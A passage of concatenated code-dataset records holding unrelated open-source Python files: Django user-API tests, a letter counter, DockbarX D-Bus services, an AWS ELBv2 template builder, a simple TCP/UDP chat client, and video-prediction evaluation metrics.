auth_admin.get('/api/users/')\n\n assert response.status_code == 200\n assert len(response.data) == 2\n assert User.objects.count() == 2\n\n\n@pytest.mark.django_db\ndef test_get_list_users_unauth_user(client):\n response = client.get('/api/users/')\n\n assert response.status_code == 200\n assert response.data == []\n\n\n@pytest.mark.django_db\ndef test_get_detail_user_auth_user(auth_user, admin):\n pk_user = auth_user.get('/api/users/').data[0]['id']\n response = 
auth_user.get(f'/api/users/{pk_user}/')\n\n assert response.status_code == 200\n assert User.objects.count() == 2\n assert response.data['username'] == USER_1['username']\n assert len(response.data) == 3\n\n\n@pytest.mark.django_db\ndef test_get_detail_other_user_auth_user(auth_user, admin):\n pk_admin = User.objects.get(username=ADMIN['username']).id\n response = auth_user.get(f'/api/users/{pk_admin}/')\n\n assert response.status_code == 403\n assert User.objects.count() == 2\n\n\n@pytest.mark.django_db\ndef test_get_detail_other_user_admin(auth_admin, user):\n pk_user = User.objects.get(username=USER_1['username']).id\n response = auth_admin.get(f'/api/users/{pk_user}/')\n\n assert response.status_code == 200\n assert User.objects.count() == 2\n assert response.data['username'] == USER_1['username']\n assert len(response.data) == 3\n\n\n@pytest.mark.django_db\ndef test_get_detail_user_unauth_user(client, user):\n pk = user.id\n response = client.get(f'/api/users/{pk}/')\n\n assert response.status_code == 401\n assert response.data['detail'] == 'Учетные данные не были предоставлены.'\n\n\n@pytest.mark.django_db\ndef test_logout_user(auth_user):\n response = auth_user.get('/api/logout/')\n\n assert response.status_code == 200\n # result = response.cookies\n","repo_name":"Vyvarka/wallet_test","sub_path":"tests/test_user.py","file_name":"test_user.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9013143018","text":"from pprint import pprint\n\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\nfor character in message:\n if character.isalpha():\n count.setdefault(character, 0)\n count[character] = count[character] + 1\n\n# create an array of tuples from the count dictionary\nitems = list(count.items())\n\n# sort by the count\nfoo = sorted(items, key=lambda c:c[1], reverse=True)\nprint(foo)\nprint('The most common letter is', foo[0][0].title(), 'which occured', foo[0][1], 'times.' )\n# print(type(items[0])) #tuple\npprint(count)","repo_name":"mrslwiseman/python","sub_path":"characterCount.py","file_name":"characterCount.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"22710305761","text":"import weakref\nimport dbus\nimport dbus.service\n\nfrom common import ODict, Globals\nfrom log import logger\n\nclass DockManager(dbus.service.Object):\n def __new__(cls, dockbar):\n if \"net.launchpad.DockManager\" in dbus.SessionBus().list_names():\n logger.debug(\"Name net.launchpad.DockManager is already\" + \\\n \" in use. 
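# The manual setdefault/sort counting in the characterCount.py record above
# is what collections.Counter provides directly -- a hedged alternative
# using the record's own message:
from collections import Counter

message = 'It was a bright cold day in April, and the clocks were striking thirteen.'
count = Counter(ch for ch in message if ch.isalpha())
letter, occurrences = count.most_common(1)[0]
print('The most common letter is', letter.title(), 'which occurred', occurrences, 'times.')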
(This instance of) DockbarX will\" + \\\n \" not use DockManager.\")\n return None\n else:\n return dbus.service.Object.__new__(cls)\n\n def __init__(self, dockbar):\n self.dockbar_r = weakref.ref(dockbar)\n bus_name = dbus.service.BusName(\"net.launchpad.DockManager\",\n bus = dbus.SessionBus())\n dbus.service.Object.__init__(self, bus_name,\n \"/net/launchpad/DockManager\")\n self.globals = Globals()\n\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"\", out_signature=\"as\",)\n def GetCapabilities(self):\n capabilities = [\"menu-item-container-title\",\n \"menu-item-icon-file\",\n \"menu-item-icon-name\",\n \"menu-item-with-label\",\n \"dock-item-badge\",\n \"dock-item-progress\"]\n return capabilities\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"\", out_signature=\"ao\",)\n def GetItems(self):\n path_list = []\n for path in self.dockbar_r().get_dm_paths():\n path_list.append(dbus.ObjectPath(path))\n return path_list\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"s\", out_signature=\"ao\",)\n def GetItemsByDesktopFile(self, name):\n path_list = []\n for path in self.dockbar_r().get_dm_paths_by_desktop_file(name):\n path_list.append(dbus.ObjectPath(path))\n logger.debug(\"Items gotten by dekstop file: %s\" % path_list)\n return path_list\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"s\", out_signature=\"ao\",)\n def GetItemsByName(self, name):\n path_list = []\n for path in self.dockbar_r().get_dm_paths_by_name(name):\n path_list.append(dbus.ObjectPath(path))\n logger.debug(\"Items gotten by name: %s\" % path_list)\n return path_list\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"i\", out_signature=\"ao\",)\n def GetItemsByPid(self, pid):\n path_list = []\n for path in self.dockbar_r().get_dm_paths_by_pid(pid):\n path_list.append(dbus.ObjectPath(path))\n logger.debug(\"Items gotten by pid: %s\" % path_list)\n return path_list\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"x\", out_signature=\"ao\",)\n def GetItemsByXid(self, xid):\n path_list = []\n for path in self.dockbar_r().get_dm_paths_by_xid(xid):\n path_list.append(dbus.ObjectPath(path))\n logger.debug(\"Items gotten by xid: %s\" % path_list)\n return path_list\n\n @dbus.service.signal(dbus_interface='net.launchpad.DockManager',\n signature='o')\n def ItemAdded(self, obj_path):\n pass\n\n @dbus.service.signal(dbus_interface='net.launchpad.DockManager',\n signature='o')\n def ItemRemoved(self, obj_path):\n pass\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='ss', out_signature='v')\n def Get(self, interface_name, property_name):\n return self.GetAll(interface_name)[property_name]\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='s', out_signature='a{sv}')\n def GetAll(self, interface_name):\n if interface_name == \"net.launchpad.DockManager\":\n return {}\n else:\n raise dbus.exceptions.DBusException(\n 'com.example.UnknownInterface',\n 'The Foo object does not implement the %s interface'\n % interface_name)\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='ssv', out_signature='')\n def Set(self, interface_name, property_name, property_value):\n pass\n\n @dbus.service.signal(dbus_interface=dbus.PROPERTIES_IFACE,\n signature='sa{sv}as')\n def PropertiesChanged(self, interface_name, changed_properties,\n 
invalidated_properties):\n pass\n\n def reset(self):\n try:\n bus = dbus.SessionBus()\n proxy = bus.get_object(\"net.launchpad.DockManager.Daemon\",\n \"/net/launchpad/DockManager/Daemon\")\n proxy.RestartAll(dbus_interface=\"net.launchpad.DockManager.Daemon\")\n except:\n logger.exception(\"Restarting DockManager Helpers failed.\")\n\n def remove(self):\n self.remove_from_connection()\n self.globals.disconnect(self.badge_sid)\n\nclass DockManagerItem(dbus.service.Object):\n counter = 0\n def __init__(self, groupbutton):\n self.groupbutton_r = weakref.ref(groupbutton)\n self.menu_counter = 0\n self.menu_items = ODict()\n self.globals = Globals()\n\n DockManagerItem.counter += 1\n self.obj_path = \"/net/launchpad/DockManager/Item\" + \\\n str(DockManagerItem.counter)\n bus_name = dbus.service.BusName(\"net.launchpad.DockManager\",\n bus = dbus.SessionBus())\n dbus.service.Object.__init__(self, bus_name, self.obj_path)\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockItem\",\n in_signature=\"a{sv}\", out_signature=\"i\")\n def AddMenuItem(self, properties):\n self.menu_counter += 1\n id = self.menu_counter\n self.menu_items[id] = dict(properties)\n return id\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockItem\",\n in_signature=\"i\", out_signature=\"\")\n def RemoveMenuItem(self, id):\n try:\n del self.menu_items[id]\n except KeyError:\n pass\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockItem\",\n in_signature=\"a{sv}\", out_signature=\"\")\n def UpdateDockItem(self, properties):\n group = groupbutton_r()\n if \"bagde\" in properties:\n group.button.set_badge(properties[\"badge\"], backend=\"dockmanager\")\n if \"progress\" in properties:\n progress = float(properties[\"progress\"])/100\n group.button.set_progress_bar(progress, backend=\"dockmanager\")\n if \"attention\" in properties:\n group.dm_attention = properties[\"attention\"]\n if group.needs_attention != group.dm_attention:\n group.needs_attention_changed()\n\n @dbus.service.signal(dbus_interface='net.launchpad.DockItem',\n signature='i')\n def MenuItemActivated(self, id):\n pass\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='ss', out_signature='v')\n def Get(self, interface, propname):\n return self.GetAll(interface)[propname]\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='s', out_signature='a{sv}')\n def GetAll(self, interface):\n if interface == \"net.launchpad.DockItem\":\n path = self.groupbutton_r().get_desktop_entry_file_name()\n return { 'DesktopFile': path,\n 'Uri': ''\n }\n else:\n raise dbus.exceptions.DBusException(\n 'com.example.UnknownInterface',\n 'The Foo object does not implement the %s interface'\n % interface)\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='ssv', out_signature='')\n def Set(self, interface, propname, value):\n pass\n\n @dbus.service.signal(dbus_interface=dbus.PROPERTIES_IFACE,\n signature='sa{sv}as')\n def PropertiesChanged(self, interface_name, changed_properties,\n invalidated_properties):\n pass\n\n def get_path(self):\n return self.obj_path\n\n def get_menu_items(self):\n return self.menu_items\n\n def remove(self):\n self.groupbutton_r().button.set_badge(None, backend=\"dockmanager\")\n self.groupbutton_r().button.set_progress_bar(None,\n backend=\"dockmanager\")\n 
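# Two apparent bugs in DockManagerItem.UpdateDockItem above: (1) `group =
# groupbutton_r()` is missing `self.` and raises NameError as written;
# (2) the key test is misspelled (`"bagde"`), so the badge branch can never
# run even though the value is read from properties["badge"]. Corrected
# opening of the method:
def UpdateDockItem(self, properties):
    group = self.groupbutton_r()
    if "badge" in properties:
        group.button.set_badge(properties["badge"], backend="dockmanager")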
self.remove_from_connection()\n","repo_name":"M7S/dockbarx","sub_path":"dockbarx/dockmanager.py","file_name":"dockmanager.py","file_ext":"py","file_size_in_byte":8872,"program_lang":"python","lang":"en","doc_type":"code","stars":282,"dataset":"github-code","pt":"83"} +{"seq_id":"16034911307","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nimport ecs_composex.common.troposphere_tools\n\nif TYPE_CHECKING:\n from ecs_composex.mods_manager import XResourceModule\n from ecs_composex.common.settings import ComposeXSettings\n\nfrom compose_x_common.compose_x_common import keyisset, keypresent, set_else_none\nfrom troposphere import AWS_NO_VALUE, AWS_STACK_NAME, GetAtt, Ref, Select, Sub, Tags\nfrom troposphere.ec2 import EIP, SecurityGroup\nfrom troposphere.elasticloadbalancingv2 import (\n LoadBalancer,\n LoadBalancerAttributes,\n SubnetMapping,\n)\n\nfrom ecs_composex.common import NONALPHANUM\nfrom ecs_composex.common.logging import LOG\nfrom ecs_composex.common.troposphere_tools import ROOT_STACK_NAME\nfrom ecs_composex.compose.x_resources.network_x_resources import NetworkXResource\nfrom ecs_composex.elbv2.elbv2_ecs import MergedTargetGroup\nfrom ecs_composex.elbv2.elbv2_params import (\n LB_ARN,\n LB_DNS_NAME,\n LB_DNS_ZONE_ID,\n LB_FULL_NAME,\n LB_NAME,\n LB_SG_ID,\n MOD_KEY,\n)\nfrom ecs_composex.elbv2.elbv2_stack.elbv2_listener import ComposeListener\nfrom ecs_composex.elbv2.elbv2_stack.helpers import (\n LISTENER_TARGET_RE,\n handle_cross_zone,\n handle_desync_mitigation_mode,\n handle_drop_invalid_headers,\n handle_http2,\n handle_timeout_seconds,\n validate_listeners_duplicates,\n)\nfrom ecs_composex.ingress_settings import Ingress, set_service_ports\nfrom ecs_composex.vpc.vpc_params import APP_SUBNETS, PUBLIC_SUBNETS, VPC_ID\n\n\nclass Elbv2(NetworkXResource):\n \"\"\"\n Class to handle ELBv2 creation and mapping to ECS Services\n \"\"\"\n\n subnets_param = APP_SUBNETS\n\n def __init__(\n self, name, definition, module: XResourceModule, settings: ComposeXSettings\n ):\n if not keyisset(\"Listeners\", definition):\n raise KeyError(\"You must specify at least one Listener for a LB.\", name)\n self.lb_is_public = False\n self.lb_type = \"application\"\n self.ingress = None\n self.lb_sg = None\n self.lb_eips = []\n self.unique_service_lb = False\n self.lb = None\n self.listeners: list[ComposeListener] = []\n self.target_groups: list[MergedTargetGroup] = []\n super().__init__(name, definition, module, settings)\n self.validate_services()\n self.sort_props()\n self.module_name = MOD_KEY\n self.ref_parameter = LB_ARN\n\n def init_outputs(self):\n self.output_properties = {\n LB_ARN: (self.logical_name, self.cfn_resource, Ref, None),\n LB_DNS_NAME: (\n f\"{self.logical_name}{LB_DNS_NAME.return_value}\",\n self.cfn_resource,\n GetAtt,\n LB_DNS_NAME.return_value,\n ),\n LB_DNS_ZONE_ID: (\n f\"{self.logical_name}{LB_DNS_ZONE_ID.return_value}\",\n self.cfn_resource,\n GetAtt,\n LB_DNS_ZONE_ID.return_value,\n ),\n LB_NAME: (\n f\"{self.logical_name}{LB_NAME.return_value}\",\n self.cfn_resource,\n GetAtt,\n LB_NAME.return_value,\n ),\n LB_FULL_NAME: (\n f\"{self.logical_name}{LB_FULL_NAME.return_value}\",\n self.cfn_resource,\n GetAtt,\n LB_FULL_NAME.return_value,\n ),\n }\n\n def set_listeners(self, template):\n \"\"\"\n Method to define the listeners\n :return:\n \"\"\"\n listeners: list[dict] = set_else_none(\"Listeners\", self.definition, [])\n if not listeners:\n raise KeyError(f\"You must define at least one listener for LB {self.name}\")\n ports = 
[listener[\"Port\"] for listener in listeners]\n validate_listeners_duplicates(self.name, ports)\n for listener_def in listeners:\n targets: list[dict] = set_else_none(\"Targets\", listener_def, [])\n if targets and self.services:\n for target in targets:\n target_parts = LISTENER_TARGET_RE.match(target[\"name\"])\n if not target_parts:\n raise ValueError(\n f\"{self.module.res_key}.{self.name} - Listener {listener_def['Port']}\"\n f\" - Target {target['name']} is not a valid value. Must match\",\n LISTENER_TARGET_RE.pattern,\n )\n if (\n f\"{target_parts.group('family')}:{target_parts.group('container')}\"\n not in [svc[\"name\"] for svc in self.services]\n ):\n listener_def[\"Targets\"].remove(target)\n if keyisset(\"Targets\", listener_def) or keyisset(\n \"DefaultActions\", listener_def\n ):\n new_listener = template.add_resource(\n ComposeListener(self, listener_def)\n )\n self.listeners.append(new_listener)\n else:\n LOG.warning(\n f\"{self.module.res_key}.{self.name} - \"\n f\"Listener {listener_def['Port']} has no action or service. Not used.\"\n )\n\n def set_services_targets(self, settings):\n \"\"\"\n Method to map services and families targets of the services defined.\n TargetStructure:\n (family, family_wide, services[], access)\n\n :param ecs_composex.common.settings.ComposeXSettings settings:\n :return:\n \"\"\"\n if not self.services:\n LOG.debug(f\"{self.module.res_key}.{self.name} No Services defined.\")\n return\n for service_def in self.services:\n family_combo_name = service_def[\"name\"]\n service_name = family_combo_name.split(\":\")[-1]\n family_name = NONALPHANUM.sub(\"\", family_combo_name.split(\":\")[0])\n LOG.info(\n f\"{self.module.res_key}.{self.name} - Adding target {family_name}:{service_name}\"\n )\n if family_name not in settings.families:\n raise ValueError(\n f\"{self.module.res_key}.{self.name} - Service family {family_name} is invalid. Defined families\",\n settings.families.keys(),\n )\n for f_service in settings.families[family_name].ordered_services:\n if f_service.name == service_name:\n if f_service not in settings.services:\n raise ValueError(\n f\"{self.module.res_key}.{self.name} Please, use only the services names.\"\n \"You cannot use the family name defined by deploy labels\"\n f\"Found {f_service}\",\n [s for s in settings.services],\n [f for f in settings.families],\n )\n elif (\n f_service.name == service_name\n and f_service in settings.services\n and f_service not in self.families_targets\n ):\n self.families_targets.append(\n (\n f_service.family,\n f_service,\n service_def,\n f\"{service_def['name']}{service_def['port']}\",\n )\n )\n break\n else:\n raise ValueError(\n f\"{self.module.res_key}.{self.name} - Could not find {service_name} in family {family_name}\"\n )\n\n self.debug_families_targets()\n\n def validate_services(self):\n services_names = list({service[\"name\"] for service in self.services})\n if len(services_names) == 1:\n LOG.info(\n f\"LB {self.name} only has a unique service. 
LB will be deployed with the service stack.\"\n )\n self.unique_service_lb = True\n\n def sort_props(self):\n self.lb_is_public = (\n True\n if (\n keyisset(\"Scheme\", self.properties)\n and self.properties[\"Scheme\"] == \"internet-facing\"\n )\n else False\n )\n self.lb_type = (\n \"application\"\n if not keyisset(\"Type\", self.properties)\n else self.properties[\"Type\"]\n )\n self.sort_sg()\n\n def sort_sg(self):\n if self.is_nlb():\n self.lb_sg = Ref(AWS_NO_VALUE)\n elif self.is_alb():\n self.lb_sg = SecurityGroup(\n f\"{self.logical_name}SecurityGroup\",\n GroupDescription=Sub(\n f\"SG for LB {self.logical_name} in ${{{AWS_STACK_NAME}}}\"\n ),\n GroupName=Sub(\n f\"{self.logical_name}-{self.lb_type}-sg-${{{AWS_STACK_NAME}}}\"\n ),\n VpcId=Ref(VPC_ID),\n Tags=Tags(Name=Sub(f\"elbv2-{self.logical_name}-${{{AWS_STACK_NAME}}}\")),\n )\n\n def sort_alb_ingress(self, settings, stack_template):\n \"\"\"\n Method to handle Ingress to ALB\n \"\"\"\n if (\n not self.parameters\n or (self.parameters and not keyisset(\"Ingress\", self.parameters))\n or self.is_nlb()\n ):\n LOG.warning(\n \"You defined ingress rules for a NLB. This is invalid. Define ingress rules at the service level.\"\n )\n return\n elif not self.parameters or (\n self.parameters and not keyisset(\"Ingress\", self.parameters)\n ):\n LOG.warning(f\"You did not define any Ingress rules for ALB {self.name}.\")\n return\n ports = [listener[\"Port\"] for listener in self.definition[\"Listeners\"]]\n ports = set_service_ports(ports)\n self.ingress = Ingress(self.parameters[\"Ingress\"], ports)\n if self.ingress and self.is_alb():\n self.ingress.set_aws_sources_ingress(\n settings, self.logical_name, GetAtt(self.lb_sg, \"GroupId\")\n )\n self.ingress.set_ext_sources_ingress(\n self.logical_name, GetAtt(self.lb_sg, \"GroupId\")\n )\n self.ingress.associate_aws_ingress_rules(stack_template)\n self.ingress.associate_ext_ingress_rules(stack_template)\n\n def define_override_subnets(self, subnets, vpc_stack):\n \"\"\"\n Method to define the subnets overrides to use for the LB\n\n :param subnets: The original subnets to replace\n :param ecs_composex.vpc.vpc_stack.VpcStack vpc_stack:\n :return: the subnet name to use\n :rtype: str\n \"\"\"\n if self.subnets_override:\n if self.subnets_override not in vpc_stack.vpc_resource.mappings.keys():\n raise KeyError(\n f\"The subnets indicated for {self.name} is not valid. 
Valid ones are\",\n vpc_stack.vpc_resource.mappings.keys(),\n )\n return self.subnets_override\n if isinstance(subnets, Ref):\n return subnets.data[\"Ref\"]\n return subnets\n\n def set_eips(self, vpc_stack):\n \"\"\"\n\n :param ecs_composex.vpc.vpc_stack.VpcStack vpc_stack:\n :return:\n \"\"\"\n if self.is_nlb() and self.lb_is_public:\n if vpc_stack.vpc_resource.cfn_resource:\n for public_subnet in vpc_stack.vpc_resource.public_subnets[1]:\n self.lb_eips.append(\n EIP(\n f\"{self.logical_name}Eip{public_subnet.title}\",\n Domain=\"vpc\",\n )\n )\n elif vpc_stack.vpc_resource.mappings:\n subnets = self.define_override_subnets(PUBLIC_SUBNETS.title, vpc_stack)\n for public_az in vpc_stack.vpc_resource.mappings[subnets][\"Azs\"]:\n self.lb_eips.append(\n EIP(\n f\"{self.logical_name}Eip{public_az.title().split('-')[-1]}\",\n Domain=\"vpc\",\n )\n )\n\n def set_subnets(self, vpc_stack):\n \"\"\"\n Method to define which subnets to use for the\n\n :param ecs_composex.vpc.vpc_stack.VpcStack vpc_stack:\n :return:\n \"\"\"\n if (\n self.subnets_override\n and vpc_stack.vpc_resource.cfn_resource\n and self.subnets_override\n not in [\n PUBLIC_SUBNETS.title,\n APP_SUBNETS.title,\n ]\n ):\n raise ValueError(\n \"When Compose-X creates the VPC, the only subnets you can define to use are\",\n [PUBLIC_SUBNETS.title, APP_SUBNETS.title],\n )\n if self.is_nlb() and self.lb_is_public:\n return Ref(AWS_NO_VALUE)\n if (\n self.subnets_override\n and not vpc_stack.vpc_resource.cfn_resource\n and vpc_stack.vpc_resource.mappings\n and self.subnets_override in vpc_stack.vpc_resource.mappings.keys()\n ):\n return Ref(self.subnets_override)\n elif self.lb_is_public:\n return Ref(PUBLIC_SUBNETS)\n return Ref(APP_SUBNETS)\n\n def set_subnet_mappings(self, vpc_stack):\n \"\"\"\n For NLB, defines the EC2 EIP and Subnets Mappings to use.\n Determines the number of EIP to produce from the VPC Settings.\n \"\"\"\n if self.is_alb():\n return Ref(AWS_NO_VALUE)\n if not self.lb_eips and self.lb_is_public:\n self.set_eips(vpc_stack)\n mappings = []\n subnets = self.define_override_subnets(PUBLIC_SUBNETS.title, vpc_stack)\n for count, eip in enumerate(self.lb_eips):\n mappings.append(\n SubnetMapping(\n AllocationId=GetAtt(eip, \"AllocationId\"),\n SubnetId=Select(count, Ref(subnets)),\n )\n )\n return mappings\n elif not self.lb_is_public:\n self.cfn_resource.Subnets = self.set_subnets(vpc_stack)\n return Ref(AWS_NO_VALUE)\n\n def parse_attributes_settings(self):\n \"\"\"\n Method to parse pre-defined settings for shortcuts\n\n :return: the lb attributes mappings\n :rtype: list\n \"\"\"\n valid_settings = [\n (\"timeout_seconds\", int, handle_timeout_seconds, self.is_alb()),\n (\n \"desync_mitigation_mode\",\n str,\n handle_desync_mitigation_mode,\n self.is_alb(),\n ),\n (\n \"drop_invalid_header_fields\",\n bool,\n handle_drop_invalid_headers,\n self.is_alb(),\n ),\n (\"http2\", bool, handle_http2, self.is_alb()),\n (\"cross_zone\", bool, handle_cross_zone, self.is_nlb()),\n ]\n mappings = []\n for setting in valid_settings:\n if (\n keypresent(setting[0], self.parameters)\n and isinstance(self.parameters[setting[0]], setting[1])\n and setting[3]\n ):\n if setting[2] and setting[3]:\n mappings.append(setting[2](self.parameters[setting[0]]))\n elif setting[3]:\n mappings.append(\n LoadBalancerAttributes(\n Key=setting[0],\n Value=str(self.parameters[setting[0]]),\n )\n )\n return mappings\n\n def set_lb_attributes(self):\n \"\"\"\n Method to define the LB attributes\n\n :return: List of LB Attributes\n :rtype: list\n \"\"\"\n 
attributes = []\n if keyisset(\"LoadBalancerAttributes\", self.properties):\n for prop in self.properties[\"LoadBalancerAttributes\"]:\n attributes.append(\n LoadBalancerAttributes(\n Key=prop,\n Value=self.properties[\"LoadBalancerAttributes\"][prop],\n )\n )\n elif (\n not keyisset(\"LoadBalancerAttributes\", self.definition) and self.parameters\n ):\n attributes = self.parse_attributes_settings()\n if attributes:\n return attributes\n return Ref(AWS_NO_VALUE)\n\n def set_lb_definition(self):\n \"\"\"\n Function to parse the LB settings and properties and build the LB object\n\n :param ecs_composex.common.settings.ComposeXSettings settings:\n \"\"\"\n attrs = {\n \"IpAddressType\": \"ipv4\"\n if not keyisset(\"IpAddressType\", self.properties)\n else self.properties[\"IpAddressType\"],\n \"Type\": self.lb_type,\n \"Scheme\": \"internet-facing\" if self.lb_is_public else \"internal\",\n \"SecurityGroups\": [Ref(self.lb_sg)]\n if isinstance(self.lb_sg, SecurityGroup)\n else self.lb_sg,\n \"Subnets\": Ref(AWS_NO_VALUE),\n \"SubnetMappings\": Ref(AWS_NO_VALUE),\n \"LoadBalancerAttributes\": self.set_lb_attributes(),\n \"Tags\": Tags(Name=Sub(f\"${{{ROOT_STACK_NAME.title}}}{self.logical_name}\")),\n \"Name\": Ref(AWS_NO_VALUE),\n }\n self.lb = LoadBalancer(self.logical_name, **attrs)\n self.cfn_resource = self.lb\n\n def is_nlb(self):\n return True if self.lb_type == \"network\" else False\n\n def is_alb(self):\n return True if self.lb_type == \"application\" else False\n\n def associate_to_template(self, template):\n \"\"\"\n Method to associate all resources to the template\n\n :param troposphere.Template template:\n :return:\n \"\"\"\n template.add_resource(self.lb)\n self.init_outputs()\n if self.lb_sg and isinstance(self.lb_sg, SecurityGroup):\n self.output_properties.update(\n {\n LB_SG_ID: (\n f\"{self.logical_name}{LB_SG_ID.return_value}\",\n self.lb_sg,\n GetAtt,\n LB_SG_ID.return_value,\n None,\n )\n }\n )\n template.add_resource(self.lb_sg)\n for eip in self.lb_eips:\n template.add_resource(eip)\n self.generate_outputs()\n\n def update_from_vpc(self, vpc_stack, settings=None):\n \"\"\"\n Override to set the specific resources right once we have a VPC Definition\n\n :param ecs_composex.vpc.vpc_stack.VpcStack vpc_stack:\n :param ecs_composex.common.settings.ComposeXSettings settings:\n \"\"\"\n if vpc_stack and vpc_stack.vpc_resource:\n if self.is_alb():\n self.cfn_resource.Subnets = self.set_subnets(vpc_stack)\n elif self.is_nlb():\n self.cfn_resource.SubnetMappings = self.set_subnet_mappings(vpc_stack)\n","repo_name":"compose-x/ecs_composex","sub_path":"ecs_composex/elbv2/elbv2_stack/elbv2.py","file_name":"elbv2.py","file_ext":"py","file_size_in_byte":19192,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"62"} +{"seq_id":"24791684608","text":"import socket\r\nimport threading\r\nimport random\r\nimport os\r\n\r\n\r\ndef tcpclient():\r\n\r\n nickname = input(\"Choose your nickname: \")\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client.connect(('127.0.0.1', 5008))\r\n\r\n def receive():\r\n while True:\r\n try:\r\n\r\n message = client.recv(1024).decode('ascii')\r\n if message == 'NICK':\r\n client.send(nickname.encode('ascii'))\r\n else:\r\n print(message)\r\n except:\r\n\r\n print(\"An error occured!\")\r\n client.close()\r\n break\r\n\r\n def write():\r\n while True:\r\n data = input()\r\n\r\n message = '{}: {}'.format(nickname, data)\r\n\r\n client.send(message.encode('ascii'))\r\n\r\n receive_thread = 
threading.Thread(target=receive)\r\n    receive_thread.start()\r\n\r\n    write_thread = threading.Thread(target=write)\r\n    write_thread.start()\r\n\r\n\r\ndef udpClient():\r\n    # Client Code\r\n    def ReceiveData(sock):\r\n        while True:\r\n            try:\r\n                data, addr = sock.recvfrom(1024)\r\n                print(data.decode('utf-8'))\r\n            except:\r\n                pass\r\n\r\n    def RunClient(serverIP):\r\n        host = socket.gethostbyname(socket.gethostname())\r\n        port = random.randint(6000, 10000)\r\n        print('Client IP->' + str(host) + ' Port->' + str(port))\r\n        server = (str(serverIP), 5000)\r\n        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n        s.bind((host, port))\r\n\r\n        name = input('Choose your Nickname: ')\r\n        if name == '':\r\n            name = 'Guest' + str(random.randint(1000, 9999))\r\n        print('Nickname:' + name)\r\n        s.sendto(name.encode('utf-8'), server)\r\n        threading.Thread(target=ReceiveData, args=(s,)).start()\r\n        while True:\r\n\r\n            data = input()\r\n            if data == 'quit':\r\n                break\r\n            elif data == '':\r\n                continue\r\n            data = '[' + name + ']' + ' : ' + data\r\n            s.sendto(data.encode('utf-8'), server)\r\n        s.sendto(data.encode('utf-8'), server)  # send the final message once more so the server sees the disconnect\r\n        s.close()\r\n        os._exit(1)\r\n\r\n    hostname = socket.gethostname()\r\n    local_ip = socket.gethostbyname(hostname)\r\n    RunClient(local_ip)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    prot = input('Choose the protocol to run on the client (udp/tcp): ')\r\n    if prot == 'udp':\r\n        print('Running the UDP protocol')\r\n        udpClient()\r\n    else:\r\n        print('Running the TCP protocol')\r\n        tcpclient()\r\n","repo_name":"xelel/chat-cliente-server","sub_path":"tcp udp chat/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"7998738220","text":"import math\nfrom operator import pos\nimport imageio\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom PIL import Image, ImageDraw\nfrom scipy import signal\nfrom skimage.metrics import peak_signal_noise_ratio as psnr_metric\nfrom skimage.metrics import structural_similarity as ssim_metric\nfrom torch.autograd import Variable\nfrom torchvision import transforms\nfrom torchvision.utils import save_image\nimport torchvision.transforms as T\n\n\ndef kl_criterion(mu, logvar, args):\n    # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n    KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n    KLD /= args.batch_size \n    return KLD\n    \ndef eval_seq(gt, pred):\n    T = len(gt)\n    bs = gt[0].shape[0]\n    ssim = np.zeros((bs, T))\n    psnr = np.zeros((bs, T))\n    mse = np.zeros((bs, T))\n    for i in range(bs):\n        for t in range(T):\n            origin = gt[t][i]\n            predict = pred[t][i]\n            for c in range(origin.shape[0]):\n                ssim[i, t] += ssim_metric(origin[c], predict[c]) \n                psnr[i, t] += psnr_metric(origin[c], predict[c])\n            ssim[i, t] /= origin.shape[0]\n            psnr[i, t] /= origin.shape[0]\n            mse[i, t] = mse_metric(origin, predict)\n\n    return mse, ssim, psnr\n\ndef mse_metric(x1, x2):\n    err = np.sum((x1 - x2) ** 2)\n    err /= float(x1.shape[0] * x1.shape[1] * x1.shape[2])\n    return err\n\n# ssim function used in Babaeizadeh et al. (2017), Finn et al. (2016), etc.
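\n# finn_eval_seq mirrors eval_seq but works on detached CPU tensors and scores SSIM as -1 when it evaluates to NaN (e.g. on constant frames).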
